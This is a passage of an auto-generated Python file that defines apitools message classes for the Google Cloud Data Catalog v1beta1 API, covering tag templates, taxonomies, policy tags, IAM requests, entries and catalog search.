googleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest: A GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest resource to be passed as the request body. name: Required. The name of the tag template. Example: * projects/{projec t_id}/locations/{location}/tagTemplates/{tag_template_id}/fields/{tag_te mplate_field_id} """ googleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest = _messages.MessageField('GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest', 1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesGetRequest object. Fields: name: Required. The name of the tag template. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTagTemplatesPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesPatchRequest object. Fields: googleCloudDatacatalogV1beta1TagTemplate: A GoogleCloudDatacatalogV1beta1TagTemplate resource to be passed as the request body. name: The resource name of the tag template in URL format. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } Note that this TagTemplate and its child resources may not actually be stored in the location in this name. updateMask: The field mask specifies the parts of the template to overwrite. Allowed fields: * `display_name` If absent or empty, all of the allowed fields above will be updated. 
""" googleCloudDatacatalogV1beta1TagTemplate = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplate', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesSetIamPolicyRequest object. Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsTagTemplatesTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsTaxonomiesCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesCreateRequest object. Fields: googleCloudDatacatalogV1beta1Taxonomy: A GoogleCloudDatacatalogV1beta1Taxonomy resource to be passed as the request body. parent: Required. Resource name of the project that the taxonomy will belong to. """ googleCloudDatacatalogV1beta1Taxonomy = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesDeleteRequest object. Fields: name: Required. Resource name of the taxonomy to be deleted. All policy tags in this taxonomy will also be deleted. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesExportRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesExportRequest object. Fields: parent: Required. Resource name of the project that taxonomies to be exported will share. serializedTaxonomies: Export taxonomies as serialized taxonomies. taxonomies: Required. Resource names of the taxonomies to be exported. """ parent = _messages.StringField(1, required=True) serializedTaxonomies = _messages.BooleanField(2) taxonomies = _messages.StringField(3, repeated=True) class DatacatalogProjectsLocationsTaxonomiesGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesGetRequest object. Fields: name: Required. Resource name of the requested taxonomy. 
""" name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesImportRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesImportRequest object. Fields: googleCloudDatacatalogV1beta1ImportTaxonomiesRequest: A GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest resource to be passed as the request body. parent: Required. Resource name of project that the newly created taxonomies will belong to. """ googleCloudDatacatalogV1beta1ImportTaxonomiesRequest = _messages.MessageField('GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesListRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesListRequest object. Fields: pageSize: The maximum number of items to return. Must be a value between 1 and 1000. If not set, defaults to 50. pageToken: The next_page_token value returned from a previous list request, if any. If not set, defaults to an empty string. parent: Required. Resource name of the project to list the taxonomies of. """ pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32) pageToken = _messages.StringField(2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsTaxonomiesPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPatchRequest object. Fields: googleCloudDatacatalogV1beta1Taxonomy: A GoogleCloudDatacatalogV1beta1Taxonomy resource to be passed as the request body. name: Output only. Resource name of this taxonomy, whose format is: "projects/{project_number}/locations/{location_id}/taxonomies/{id}". updateMask: The update mask applies to the resource. For the `FieldMask` definition, see https://developers.google.com/protocol- buffers/docs/reference/google.protobuf#fieldmask If not set, defaults to all of the fields that are allowed to update. """ googleCloudDatacatalogV1beta1Taxonomy = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsCreateRequest object. Fields: googleCloudDatacatalogV1beta1PolicyTag: A GoogleCloudDatacatalogV1beta1PolicyTag resource to be passed as the request body. parent: Required. Resource name of the taxonomy that the policy tag will belong to. """ googleCloudDatacatalogV1beta1PolicyTag = _messages.MessageField('GoogleCloudDatacatalogV1beta1PolicyTag', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsDeleteRequest object. Fields: name: Required. Resource name of the policy tag to be deleted. All of its descendant policy tags will also be deleted. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. 
""" getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetRequest object. Fields: name: Required. Resource name of the requested policy tag. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsListRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsListRequest object. Fields: pageSize: The maximum number of items to return. Must be a value between 1 and 1000. If not set, defaults to 50. pageToken: The next_page_token value returned from a previous List request, if any. If not set, defaults to an empty string. parent: Required. Resource name of the taxonomy to list the policy tags of. """ pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32) pageToken = _messages.StringField(2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsPatchRequest object. Fields: googleCloudDatacatalogV1beta1PolicyTag: A GoogleCloudDatacatalogV1beta1PolicyTag resource to be passed as the request body. name: Output only. Resource name of this policy tag, whose format is: "pro jects/{project_number}/locations/{location_id}/taxonomies/{taxonomy_id}/ policyTags/{id}". updateMask: The update mask applies to the resource. Only display_name, description and parent_policy_tag can be updated and thus can be listed in the mask. If update_mask is not provided, all allowed fields (i.e. display_name, description and parent) will be updated. For more information including the `FieldMask` definition, see https://developers.google.com/protocol- buffers/docs/reference/google.protobuf#fieldmask If not set, defaults to all of the fields that are allowed to update. """ googleCloudDatacatalogV1beta1PolicyTag = _messages.MessageField('GoogleCloudDatacatalogV1beta1PolicyTag', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsSetIamPolicyRequest object. Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsTaxonomiesSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesSetIamPolicyRequest object. 
Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsTaxonomiesTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class Empty(_messages.Message): r"""A generic empty message that you can re-use to avoid defining duplicated empty messages in your APIs. A typical example is to use it as the request or the response type of an API method. For instance: service Foo { rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON representation for `Empty` is empty JSON object `{}`. """ class Expr(_messages.Message): r"""Represents a textual expression in the Common Expression Language (CEL) syntax. CEL is a C-like expression language. The syntax and semantics of CEL are documented at https://github.com/google/cel-spec. Example (Comparison): title: "Summary size limit" description: "Determines if a summary is less than 100 chars" expression: "document.summary.size() < 100" Example (Equality): title: "Requestor is owner" description: "Determines if requestor is the document owner" expression: "document.owner == request.auth.claims.email" Example (Logic): title: "Public documents" description: "Determine whether the document should be publicly visible" expression: "document.type != 'private' && document.type != 'internal'" Example (Data Manipulation): title: "Notification string" description: "Create a notification string with a timestamp." expression: "'New message received at ' + string(document.create_time)" The exact variables and functions that may be referenced within an expression are determined by the service that evaluates it. See the service documentation for additional information. Fields: description: Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI. expression: Textual representation of an expression in Common Expression Language syntax. location: Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file. title: Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs which allow to enter the expression. """ description = _messages.StringField(1) expression = _messages.StringField(2) location = _messages.StringField(3) title = _messages.StringField(4) class GetIamPolicyRequest(_messages.Message): r"""Request message for `GetIamPolicy` method. Fields: options: OPTIONAL: A `GetPolicyOptions` object for specifying options to `GetIamPolicy`. This field is only used by Cloud IAM. """ options = _messages.MessageField('GetPolicyOptions', 1) class GetPolicyOptions(_messages.Message): r"""Encapsulates settings provided to GetIamPolicy. Fields: requestedPolicyVersion: Optional. 
The policy format version to be returned. Valid values are 0, 1, and 3. Requests specifying an invalid value will be rejected. Requests for policies with any conditional bindings must specify version 3. Policies without any conditional bindings may specify any valid value or leave the field unset. """ requestedPolicyVersion = _messages.IntegerField(1, variant=_messages.Variant.INT32) class GoogleCloudDatacatalogV1beta1BigQueryDateShardedSpec(_messages.Message): r"""Spec for a group of BigQuery tables with name pattern `[prefix]YYYYMMDD`. Context: https://cloud.google.com/bigquery/docs /partitioned-tables#partitioning_versus_sharding Fields: dataset: Output only. The Data Catalog resource name of the dataset entry the current table belongs to, for example, `projects/{project_id}/locati ons/{location}/entrygroups/{entry_group_id}/entries/{entry_id}`. shardCount: Output only. Total number of shards. tablePrefix: Output only. The table name prefix of the shards. The name of any given shard is `[table_prefix]YYYYMMDD`, for example, for shard `MyTable20180101`, the `table_prefix` is `MyTable`. """ dataset = _messages.StringField(1) shardCount = _messages.IntegerField(2) tablePrefix = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1BigQueryTableSpec(_messages.Message): r"""Describes a BigQuery table. Enums: TableSourceTypeValueValuesEnum: Output only. The table source type. Fields: tableSourceType: Output only. The table source type. tableSpec: Spec of a BigQuery table. This field should only be populated if `table_source_type` is `BIGQUERY_TABLE`. viewSpec: Table view specification. This field should only be populated if `table_source_type` is `BIGQUERY_VIEW`. """ class TableSourceTypeValueValuesEnum(_messages.Enum): r"""Output only. The table source type. Values: TABLE_SOURCE_TYPE_UNSPECIFIED: Default unknown type. BIGQUERY_VIEW: Table view. BIGQUERY_TABLE: BigQuery native table. """ TABLE_SOURCE_TYPE_UNSPECIFIED = 0 BIGQUERY_VIEW = 1 BIGQUERY_TABLE = 2 tableSourceType = _messages.EnumField('TableSourceTypeValueValuesEnum', 1) tableSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1TableSpec', 2) viewSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1ViewSpec', 3) class GoogleCloudDatacatalogV1beta1ColumnSchema(_messages.Message): r"""Representation of a column within a schema. Columns could be nested inside other columns. Fields: column: Required. Name of the column. description: Optional. Description of the column. Default value is an empty string. mode: Optional. A column's mode indicates whether the values in this column are required, nullable, etc. Only `NULLABLE`, `REQUIRED` and `REPEATED` are supported. Default mode is `NULLABLE`. subcolumns: Optional. Schema of sub-columns. A column can have zero or more sub-columns. type: Required. Type of the column. """ column = _messages.StringField(1) description = _messages.StringField(2) mode = _messages.StringField(3) subcolumns = _messages.MessageField('GoogleCloudDatacatalogV1beta1ColumnSchema', 4, repeated=True) type = _messages.StringField(5) class GoogleCloudDatacatalogV1beta1Entry(_messages.Message): r"""Entry Metadata. A Data Catalog Entry resource represents another resource in Google Cloud Platform, such as a BigQuery dataset or a Cloud Pub/Sub topic. Clients can use the `linked_resource` field in the Entry resource to refer to the original resource ID of the source system. An Entry resource contains resource details, such as its schema. An Entry can also be used to attach flexible metadata, such as a Tag. 
Enums: TypeValueValuesEnum: The type of the entry. Fields: bigqueryDateShardedSpec: Specification for a group of BigQuery tables with name pattern `[prefix]YYYYMMDD`. Context: https://cloud.google.com/bigquery/docs/partitioned- tables#partitioning_versus_sharding. bigqueryTableSpec: Specification that applies to a BigQuery table. This is only valid on entries of type `TABLE`. description: Entry description, which can consist of several sentences or paragraphs that describe entry contents. Default value is an empty string. displayName: Display information such as title and description. A short name to identify the entry, for example, "Analytics Data - Jan 2011". Default value is an empty string. gcsFilesetSpec: Specification that applies to a Cloud Storage fileset. This is only valid on entries of type FILESET. linkedResource: Output only. The resource this metadata entry refers to. For Google Cloud Platform resources, `linked_resource` is the [full name of the resource](https://cloud.google.com/apis/design/resource_names#ful l_resource_name). For example, the `linked_resource` for a table resource from BigQuery is: * //bigquery.googleapis.com/projects/project Id/datasets/datasetId/tables/tableId name: The Data Catalog resource name of the entry in URL format. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id }/entries/{entry_id} Note that this Entry and its child resources may not actually be stored in the location in this name. schema: Schema of the entry. An entry might not have any schema attached to it. sourceSystemTimestamps: Output only. Timestamps about the underlying Google Cloud Platform resource, not about this Data Catalog Entry. type: The type of the entry. """ class TypeValueValuesEnum(_messages.Enum): r"""The type of the entry. Values: ENTRY_TYPE_UNSPECIFIED: Default unknown type TABLE: Output only. The type of entry that has a GoogleSQL schema, including logical views. MODEL: Output only. The type of models. DATA_STREAM: Output only. An entry type which is used for streaming entries. Example: Cloud Pub/Sub topic. FILESET: Alpha feature. An entry type which is a set of files or objects. Example: Cloud Storage fileset. """ ENTRY_TYPE_UNSPECIFIED = 0 TABLE = 1 MODEL = 2 DATA_STREAM = 3 FILESET = 4 bigqueryDateShardedSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1BigQueryDateShardedSpec', 1) bigqueryTableSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1BigQueryTableSpec', 2) description = _messages.StringField(3) displayName = _messages.StringField(4) gcsFilesetSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1GcsFilesetSpec', 5) linkedResource = _messages.StringField(6) name = _messages.StringField(7) schema = _messages.MessageField('GoogleCloudDatacatalogV1beta1Schema', 8) sourceSystemTimestamps = _messages.MessageField('GoogleCloudDatacatalogV1beta1SystemTimestamps', 9) type = _messages.EnumField('TypeValueValuesEnum', 10) class GoogleCloudDatacatalogV1beta1EntryGroup(_messages.Message): r"""EntryGroup Metadata. An EntryGroup resource represents a logical grouping of zero or more Data Catalog Entry resources. Fields: dataCatalogTimestamps: Output only. Timestamps about this EntryGroup. Default value is empty timestamps. description: Entry group description, which can consist of several sentences or paragraphs that describe entry group contents. Default value is an empty string. displayName: A short name to identify the entry group, for example, "analytics data - jan 2011". Default value is an empty string. 
name: The resource name of the entry group in URL format. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} Note that this EntryGroup and its child resources may not actually be stored in the location in this name. """ dataCatalogTimestamps = _messages.MessageField('GoogleCloudDatacatalogV1beta1SystemTimestamps', 1) description = _messages.StringField(2) displayName = _messages.StringField(3) name = _messages.StringField(4) class GoogleCloudDatacatalogV1beta1ExportTaxonomiesResponse(_messages.Message): r"""Response message for ExportTaxonomies. Fields: taxonomies: List of taxonomies and policy tags in a tree structure. """ taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedTaxonomy', 1, repeated=True) class GoogleCloudDatacatalogV1beta1FieldType(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1FieldType object. Enums: PrimitiveTypeValueValuesEnum: Represents primitive types - string, bool etc. Fields: enumType: Represents an enum type. primitiveType: Represents primitive types - string, bool etc. """ class PrimitiveTypeValueValuesEnum(_messages.Enum): r"""Represents primitive types - string, bool etc. Values: PRIMITIVE_TYPE_UNSPECIFIED: This is the default invalid value for a type. DOUBLE: A double precision number. STRING: An UTF-8 string. BOOL: A boolean value. TIMESTAMP: A timestamp. """ PRIMITIVE_TYPE_UNSPECIFIED = 0 DOUBLE = 1 STRING = 2 BOOL = 3 TIMESTAMP = 4 enumType = _messages.MessageField('GoogleCloudDatacatalogV1beta1FieldTypeEnumType', 1) primitiveType = _messages.EnumField('PrimitiveTypeValueValuesEnum', 2) class GoogleCloudDatacatalogV1beta1FieldTypeEnumType(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1FieldTypeEnumType object. Fields: allowedValues: Required on create; optional on update. The set of allowed values for this enum. This set must not be empty, the display names of the values in this set must not be empty and the display names of the values must be case-insensitively unique within this set. Currently, enum values can only be added to the list of allowed values. Deletion and renaming of enum values are not supported. Can have up to 500 allowed values. """ allowedValues = _messages.MessageField('GoogleCloudDatacatalogV1beta1FieldTypeEnumTypeEnumValue', 1, repeated=True) class GoogleCloudDatacatalogV1beta1FieldTypeEnumTypeEnumValue(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1FieldTypeEnumTypeEnumValue object. Fields: displayName: Required. The display name of the enum value. Must not be an empty string. """ displayName = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1GcsFileSpec(_messages.Message): r"""Specifications of a single file in Cloud Storage. Fields: filePath: Required. The full file path. Example: `gs://bucket_name/a/b.txt`. gcsTimestamps: Output only. Timestamps about the Cloud Storage file. sizeBytes: Output only. The size of the file, in bytes. """ filePath = _messages.StringField(1) gcsTimestamps = _messages.MessageField('GoogleCloudDatacatalogV1beta1SystemTimestamps', 2) sizeBytes = _messages.IntegerField(3) class GoogleCloudDatacatalogV1beta1GcsFilesetSpec(_messages.Message): r"""Describes a Cloud Storage fileset entry. Fields: filePatterns: Required. Patterns to identify a set of files in Google Cloud Storage. See [Cloud Storage documentation](/storage/docs/gsutil/addlhelp/WildcardNames) for more information. Note that bucket wildcards are currently not supported. 
Examples of valid file_patterns: * `gs://bucket_name/dir/*`: matches all files within `bucket_name/dir` directory. * `gs://bucket_name/dir/**`: matches all files in `bucket_name/dir` spanning all subdirectories. * `gs://bucket_name/file*`: matches files prefixed by `file` in `bucket_name` * `gs://bucket_name/??.txt`: matches files with two characters followed by `.txt` in `bucket_name` * `gs://bucket_name/[aeiou].txt`: matches files that contain a single vowel character followed by `.txt` in `bucket_name` * `gs://bucket_name/[a-m].txt`: matches files that contain `a`, `b`, ... or `m` followed by `.txt` in `bucket_name` * `gs://bucket_name/a/*/b`: matches all files in `bucket_name` that match `a/*/b` pattern, such as `a/c/b`, `a/d/b` * `gs://another_bucket/a.txt`: matches `gs://another_bucket/a.txt` You can combine wildcards to provide more powerful matches, for example: * `gs://bucket_name/[a-m]??.j*g` sampleGcsFileSpecs: Output only. Sample files contained in this fileset, not all files contained in this fileset are represented here. """ filePatterns = _messages.StringField(1, repeated=True) sampleGcsFileSpecs = _messages.MessageField('GoogleCloudDatacatalogV1beta1GcsFileSpec', 2, repeated=True) class GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest(_messages.Message): r"""Request message for ImportTaxonomies. Fields: inlineSource: Inline source used for taxonomies import """ inlineSource = _messages.MessageField('GoogleCloudDatacatalogV1beta1InlineSource', 1) class GoogleCloudDatacatalogV1beta1ImportTaxonomiesResponse(_messages.Message): r"""Response message for ImportTaxonomies. Fields: taxonomies: Taxonomies that were imported. """ taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 1, repeated=True) class GoogleCloudDatacatalogV1beta1InlineSource(_messages.Message): r"""Inline source used for taxonomies import. Fields: taxonomies: Required. Taxonomies to be imported. """ taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedTaxonomy', 1, repeated=True) class GoogleCloudDatacatalogV1beta1ListPolicyTagsResponse(_messages.Message): r"""Response message for ListPolicyTags. Fields: nextPageToken: Token used to retrieve the next page of results, or empty if there are no more results in the list. policyTags: The policy tags that are in the requested taxonomy. """ nextPageToken = _messages.StringField(1) policyTags = _messages.MessageField('GoogleCloudDatacatalogV1beta1PolicyTag', 2, repeated=True) class GoogleCloudDatacatalogV1beta1ListTagsResponse(_messages.Message): r"""Response message for ListTags. Fields: nextPageToken: Token to retrieve the next page of results. It is set to empty if no items remain in results. tags: Tag details. """ nextPageToken = _messages.StringField(1) tags = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 2, repeated=True) class GoogleCloudDatacatalogV1beta1ListTaxonomiesResponse(_messages.Message): r"""Response message for ListTaxonomies. Fields: nextPageToken: Token used to retrieve the next page of results, or empty if there are no more results in the list. taxonomies: Taxonomies that the project contains. """ nextPageToken = _messages.StringField(1) taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 2, repeated=True) class GoogleCloudDatacatalogV1beta1PolicyTag(_messages.Message): r"""Denotes one policy tag in a taxonomy (e.g. ssn). Policy Tags can be defined in a hierarchy. For example, consider the following hierachy: Geolocation -&gt; (LatLong, City, ZipCode). 
PolicyTag "Geolocation" contains three child policy tags: "LatLong", "City", and "ZipCode". Fields: childPolicyTags: Output only. Resource names of child policy tags of this policy tag. description: Description of this policy tag. It must: contain only unicode characters, tabs, newlines, carriage returns and page breaks; and be at most 2000 bytes long when encoded in UTF-8. If not set, defaults to an empty description. displayName: Required. User defined name of this policy tag. It must: be unique within the parent taxonomy; contain only unicode letters, numbers, underscores, dashes and spaces; not start or end with spaces; and be at most 200 bytes long when encoded in UTF-8. name: Output only. Resource name of this policy tag, whose format is: "pro jects/{project_number}/locations/{location_id}/taxonomies/{taxonomy_id}/ policyTags/{id}". parentPolicyTag: Resource name of this policy tag's parent policy tag (e.g. for the "LatLong" policy tag in the example above, this field contains the resource name of the "Geolocation" policy tag). If empty, it means this policy tag is a top level policy tag (e.g. this field is empty for the "Geolocation" policy tag in the example above). If not set, defaults to an empty string. """ childPolicyTags = _messages.StringField(1, repeated=True) description = _messages.StringField(2) displayName = _messages.StringField(3) name = _messages.StringField(4) parentPolicyTag = _messages.StringField(5) class GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest(_messages.Message): r"""Request message for RenameTagTemplateField. Fields: newTagTemplateFieldId: Required. The new ID of this tag template field. For example, `my_new_field`. """ newTagTemplateFieldId = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1Schema(_messages.Message): r"""Represents a schema (e.g. BigQuery, GoogleSQL, Avro schema). Fields: columns: Required. Schema of columns. A maximum of 10,000 columns and sub- columns can be specified. """ columns = _messages.MessageField('GoogleCloudDatacatalogV1beta1ColumnSchema', 1, repeated=True) class GoogleCloudDatacatalogV1beta1SearchCatalogRequest(_messages.Message): r"""Request message for SearchCatalog. Fields: orderBy: Specifies the ordering of results, currently supported case- sensitive choices are: * `relevance`, only supports descending * `last_access_timestamp [asc|desc]`, defaults to descending if not specified * `last_modified_timestamp [asc|desc]`, defaults to descending if not specified If not specified, defaults to `relevance` descending. pageSize: Number of results in the search page. If <=0 then defaults to 10. Max limit for page_size is 1000. Throws an invalid argument for page_size > 1000. pageToken: Optional. Pagination token returned in an earlier SearchCatalogResponse.next_page_token, which indicates that this is a continuation of a prior SearchCatalogRequest call, and that the system should return the next page of data. If empty, the first page is returned. query: Required. The query string in search query syntax. The query must be non-empty. Query strings can be as simple as "x" or more qualified as: * name:x * column:x * description:y Note: Query tokens need to have a minimum of 3 characters for substring matching to work correctly. See [Data Catalog Search Syntax](/data-catalog/docs/how-to/search-reference) for more information. scope: Required. The scope of this search request.
""" orderBy = _messages.StringField(1) pageSize = _messages.IntegerField(2, variant=_messages.Variant.INT32) pageToken = _messages.StringField(3) query = _messages.StringField(4) scope = _messages.MessageField('GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope', 5) class GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope object. Fields: includeGcpPublicDatasets: If `true`, include Google Cloud Platform (GCP) public datasets in the search results. Info on GCP public datasets is available at https://cloud.google.com/public-datasets/. By default, GCP public datasets are excluded. includeOrgIds: Data Catalog tries to automatically choose the right corpus of data to search through. You can ensure an organization is included by adding it to `include_org_ids`. You can ensure a project's org is included with `include_project_ids`. You must specify at least one organization using `include_org_ids` or `include_project_ids` in all search requests. List of organization IDs to search within. To find your organization ID, follow instructions in https://cloud.google.com /resource-manager/docs/creating-managing-organization. includeProjectIds: List of project IDs to search within. To learn more about the distinction between project names/IDs/numbers, go to https://cloud.google.com/docs/overview/#projects. """ includeGcpPublicDatasets = _messages.BooleanField(1) includeOrgIds = _messages.StringField(2, repeated=True) includeProjectIds = _messages.StringField(3, repeated=True) class GoogleCloudDatacatalogV1beta1SearchCatalogResponse(_messages.Message): r"""Response message for SearchCatalog. Fields: nextPageToken: The token that can be used to retrieve the next page of results. results: Search results. """ nextPageToken = _messages.StringField(1) results = _messages.MessageField('GoogleCloudDatacatalogV1beta1SearchCatalogResult', 2, repeated=True) class GoogleCloudDatacatalogV1beta1SearchCatalogResult(_messages.Message): r"""A result that appears in the response of a search request. Each result captures details of one entry that matches the search. Enums: SearchResultTypeValueValuesEnum: Type of the search result. This field can be used to determine which Get method to call to fetch the full resource. Fields: linkedResource: The full name of the cloud resource the entry belongs to. See: https://cloud.google.com/apis/design/resource_names#full_resource_name. Example: * `//bigquery.googleapis.com/projects/projectId/datasets/data setId/tables/tableId` relativeResourceName: The relative resource name of the resource in URL format. Examples: * `projects/{project_id}/locations/{location_id}/ent ryGroups/{entry_group_id}/entries/{entry_id}` * `projects/{project_id}/tagTemplates/{tag_template_id}` searchResultSubtype: Sub-type of the search result. This is a dot- delimited description of the resource's full type, and is the same as the value callers would provide in the "type" search facet. Examples: `entry.table`, `entry.dataStream`, `tagTemplate`. searchResultType: Type of the search result. This field can be used to determine which Get method to call to fetch the full resource. """ class SearchResultTypeValueValuesEnum(_messages.Enum): r"""Type of the search result. This field can be used to determine which Get method to call to fetch the full resource. Values: SEARCH_RESULT_TYPE_UNSPECIFIED: Default unknown type. ENTRY: An Entry. TAG_TEMPLATE: A TagTemplate. ENTRY_GROUP: An EntryGroup. 
